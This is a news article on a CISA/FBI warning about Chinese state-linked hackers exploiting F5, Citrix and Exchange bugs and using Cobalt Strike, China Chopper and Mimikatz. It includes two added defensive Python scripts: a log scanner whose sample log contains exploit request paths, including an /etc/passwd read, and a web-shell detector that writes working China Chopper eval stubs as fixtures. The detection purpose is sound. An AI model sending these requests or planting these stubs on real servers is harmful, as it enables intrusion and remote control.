Thursday, January 21, 17:48

China: Funds hackers for attacks in the US by exploiting Exchange, Citrix, F5 bugs!

The US government warns that Chinese state-backed hackers are attacking government services by exploiting bugs in Microsoft Exchange servers and in Citrix and F5 devices.

More specifically, CISA and the FBI warn that hackers linked to China's Ministry of State Security (MSS) are attacking US government agencies and private companies by exploiting bugs in publicly exposed systems.

China vs USA

According to a recent indictment by the US Department of Justice, hackers linked to the MSS have targeted a range of industries in the US and other countries, among them high-tech manufacturing, medical device manufacturing, civil engineering, educational institutions, pharmaceutical companies and the defense sector of the targeted countries. The attacks are part of a campaign that lasted more than ten years, in which the hackers acted both for their own benefit and on behalf of the Chinese MSS.

In their attacks, the hackers find vulnerable, publicly exposed devices using the Shodan search engine and vulnerability databases such as CVE (Common Vulnerabilities and Exposures) and the NVD (National Vulnerability Database).


According to BleepingComputer, CISA has observed the hackers targeting bugs in F5, Citrix and Microsoft Exchange Server to gain access to an organization's network and collect data. According to CISA, the most notable Exchange, Citrix and F5 bugs targeted by the hackers are the following:

  • CVE-2020-5902 (F5 BIG-IP): lets an unauthenticated remote attacker reach the Traffic Management User Interface (TMUI) of the BIG-IP application delivery controller (ADC) and execute arbitrary code on the device.
  • CVE-2019-19781 (Citrix ADC, Citrix Gateway and Citrix SD-WAN WANOP appliances): a path traversal bug that lets an unauthenticated attacker execute arbitrary commands on the appliance and use it as a foothold into the network.
  • CVE-2020-0688 (Microsoft Exchange Server): a bug in the Exchange Control Panel (ECP) component, caused by every Exchange installation shipping with the same static cryptographic keys instead of generating unique ones. An attacker who holds valid credentials for any mailbox can use the known key to forge a request that the server deserializes, giving remote code execution (RCE) on the server with SYSTEM privileges.
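For defenders who want to check their own access logs for the three bugs above, the following is an added example, not code from the original article or from CISA. It scans web-server access logs for the request patterns widely published as indicators of exploitation attempts against each CVE. It assumes Combined Log Format (the sample log is constructed); the indicator patterns are a starting point, not a complete signature set, since attackers vary encoding and casing.

```python
"""
Added example (not from the original article or from CISA): scan web-server
access logs for request patterns associated with exploitation attempts
against CVE-2020-5902, CVE-2019-19781 and CVE-2020-0688. Assumptions: logs
are in Combined Log Format (the sample below is constructed), and the
indicators are the widely published ones for each CVE.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

# Combined Log Format: ip ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Indicators are matched against the URL-decoded, lower-cased request path.
INDICATORS = {
    # CVE-2020-5902: the "/..;/" segment lets an unauthenticated request reach
    # TMUI's workspace JSPs (file read/write, tmsh command execution).
    "CVE-2020-5902": [
        re.compile(r"/tmui/login\.jsp/\.\.;/"),
        re.compile(r"/tmui/locallb/workspace/(fileread|filesave|tmshcmd)\.jsp"),
    ],
    # CVE-2019-19781: path traversal from /vpn/ into the /vpns/ Perl scripts.
    "CVE-2019-19781": [
        re.compile(r"/vpn/\.\./vpns/"),
        re.compile(r"/vpns/portal/scripts/newbm\.pl"),
        re.compile(r"/vpns/cfg/smb\.conf"),
    ],
    # CVE-2020-0688: the forged ViewState is delivered in the query string of
    # /ecp/default.aspx; legitimate ECP traffic does not carry __VIEWSTATE there.
    "CVE-2020-0688": [
        re.compile(r"/ecp/[^?]*\?.*__viewstate="),
    ],
}


@dataclass(frozen=True)
class Hit:
    cve: str
    ip: str
    method: str
    path: str
    status: str


def scan_log(lines):
    """Return one Hit per (log line, CVE) whose request path matches an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line: skip rather than crash
        raw_path = m.group("path")
        decoded = unquote(raw_path).lower()  # undo %2f-style encoding before matching
        for cve, patterns in INDICATORS.items():
            if any(p.search(decoded) for p in patterns):
                hits.append(Hit(cve, m.group("ip"), m.group("method"), raw_path, m.group("status")))
    return hits


def count_by_cve(hits):
    """Summarise hits as {cve: number of matching requests}."""
    return dict(Counter(h.cve for h in hits))


# Constructed sample log: four exploitation attempts followed by two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jan/2021:17:48:01 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1533 "-" "curl/7.64.1"
198.51.100.23 - - [21/Jan/2021:17:48:05 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 85 "-" "python-requests/2.22.0"
198.51.100.23 - - [21/Jan/2021:17:48:06 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 12 "-" "python-requests/2.22.0"
192.0.2.44 - - [21/Jan/2021:17:49:10 +0000] "GET /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=AAAA HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Jan/2021:17:50:00 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.6 - - [21/Jan/2021:17:50:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h.cve}  {h.ip:<15} {h.method} {h.path} -> {h.status}")
    print(count_by_cve(found))
```

A 200 response to a CVE-2019-19781 or CVE-2020-5902 probe is the case to treat as a likely compromise rather than a scan; a 500 on the ECP request usually means the forged ViewState failed, which is still worth reviewing because it shows the attacker already has working mailbox credentials.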

Once a network is compromised, the hackers download a set of tools that let them extend their access to other computers on the network. According to CISA, the tools they typically deploy include the following:

Cobalt Strike: Cobalt Strike is a legitimate adversary simulation platform intended for security professionals assessing the security of a network. The hackers use it with crafted URIs to establish backdoor access to compromised systems and to stage additional tools on the target network.

China Chopper Web Shell: This tool lets the hackers plant PHP, ASP, ASPX, JSP and CFM web shells (backdoors) on publicly exposed web servers. Once the China Chopper web shell is installed, the hackers have full command execution on the server through the exposed site.
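As an added example (not code from the original article or from CISA), the following scanner walks a web root and flags files whose contents match the one-line server-side stubs that the China Chopper client talks to. It assumes the widely published PHP, ASP and ASPX stub shapes; the POST parameter name is chosen by the attacker, so the patterns accept any name. The sample web root it scans is constructed in a temporary directory.

```python
"""
Added example (not from the original article or from CISA): walk a web root
and flag files whose contents look like China Chopper server-side stubs.
Assumptions: the signatures are the widely published PHP, ASP and ASPX
variants, and the sample web root is constructed in a temp directory.
"""
import re
import tempfile
from pathlib import Path

# One pattern per known stub shape. Case-insensitive, since attackers vary casing.
SHELL_PATTERNS = {
    # PHP:  <?php @eval($_POST['pass']); ?>
    "china_chopper_php": re.compile(
        r"<\?php\s*@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[", re.I),
    # ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
    "china_chopper_aspx": re.compile(r"<%\s*eval\s*\(\s*Request\.Item\s*\[", re.I),
    # ASP:  <%eval request("pass")%>
    "china_chopper_asp": re.compile(r"<%\s*eval\s+request\s*\(", re.I),
}
# Extensions the web server would execute; the article lists PHP, ASP, ASPX, JSP and CFM.
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".cfm"}


def classify(content: str) -> list[str]:
    """Names of the stub patterns found in a file's contents (empty if clean)."""
    return [name for name, pat in SHELL_PATTERNS.items() if pat.search(content)]


def scan_webroot(root) -> list[tuple[str, list[str]]]:
    """Return [(path relative to root, matched pattern names)] for suspicious files."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(errors="ignore")  # tolerate non-UTF-8 bytes
        except OSError:
            continue  # unreadable file: skip it, one error must not abort the scan
        names = classify(text)
        if names:
            findings.append((path.relative_to(root).as_posix(), names))
    return findings


def build_sample_webroot(root) -> None:
    """Populate a constructed web root: two benign pages and three planted stubs."""
    root = Path(root)
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "owa" / "auth" / "logon.aspx").write_text('<%@ Page Language="C#" %>\n<html></html>\n')
    (root / "uploads").mkdir()
    (root / "uploads" / "img.php").write_text("<?php @eval($_POST['password']);?>")
    (root / "uploads" / "view.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>')
    (root / "uploads" / "x.asp").write_text('<%eval request("password")%>')


def demo() -> list[tuple[str, list[str]]]:
    """Build the sample web root in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, names in demo():
        print(f"{rel}: {', '.join(names)}")
```

Signature matching only catches the unmodified stubs; a practical hunt pairs it with file timestamps and with web-server logs showing POST requests to pages that should never receive them.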

Mimikatz: Mimikatz is a tool that lets the hackers extract Windows credentials held in a computer's memory. It is commonly used by attackers, ransomware operators included, to obtain admin credentials and compromise Windows domain controllers.

Using these three tools, the hackers move laterally from a compromised system to other devices until they control the targeted network. CISA also warns that the hackers are exploiting the Microsoft Exchange CVE-2020-0688 RCE bug to collect email from Exchange servers in Federal Government environments.

CISA and FBI recommendations

CISA and the FBI therefore recommend that organizations monitor their infrastructure daily and routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Doing so denies sophisticated cyber threat actors their easiest openings and protects the organization's resources and information.
